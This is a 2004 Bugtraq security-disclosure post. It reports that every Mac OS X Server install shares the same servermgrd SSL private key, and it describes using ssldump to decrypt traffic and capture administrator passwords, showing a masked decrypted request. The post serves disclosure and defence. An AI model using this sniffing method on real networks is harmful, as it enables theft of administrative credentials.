[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <E0E79C13-17DF-11D9-ABF1-000A95DF2556@mac.com>
Date: Wed, 6 Oct 2004 15:37:10 -0600
From: Michael Bartosh <mbartosh@....com>
To: bugtraq@...urityfocus.com
Subject: Latest Apple Sec update
Submitted this to Apple product security ~3weeks ago; fixed in latest
sec update a couple of days ago.
servermgrd is a modified version of apache used by Apple in Mac OS X
Server as a management back end. It uses ssl for encryption. Out of box,
every install of Mac OS X Server uses the same private key (pasting it
here since its wide distribution can not feasibly be called private).
[SNIP]
Using the ssldump (http://www.rtfm.com/ssldump/) utility* I've several
times in the last week sat on
wireless networks and obtained administrative passwords for several Mac
OS
X Server. I've long figured this was possible but did not really look
into
it until I had to finish that chapter of my book (O'Reilly's Mac OS X
Server book). The decrypted packet looks like this:
12 10 0.4775 (0.0007) C>S application_data
---------------------------------------------------------------
POST /commands/servermgr_info HTTP/1.0
Host: gs.4am-media.com:311
Authorization: Basic xxxxxxxxxxxxxx
HTTP_USER_AGENT: CFNetwork-ServerManagerDaemonSession
Content-Length: 0
...where xxxxxxxxxxxxxx is the base64 encoded version of the password
specified at login.
We must assume every packet on every network is likely to be sniffed.
For
the price of $500 anyone anywhere can obtain the private key used to
administer tens of thousands of servers. At the very least this should
be
widely documented, yet a search at apple.com/support for servermgrd and
Server Admin SSL yield nothing. This is very briefly hinted at on page
17
of the Command Line Administration Guide. This text, though, is
misleading
at best in its failure to advertise the rather insecure out of box state
of servermgrd.
[SNIP]
*note trivial diff to get it to build on Mac OS X
crap:~/Desktop/ssldump-0.9b3 mab9718$ diff configure configure.orig
1213,1215d1212
< if test -f $dir/libssl.dylib -a -f $dir/libcrypto.dylib;
then
< found_ssl="true"
< fi
Powered by blists - more mailing lists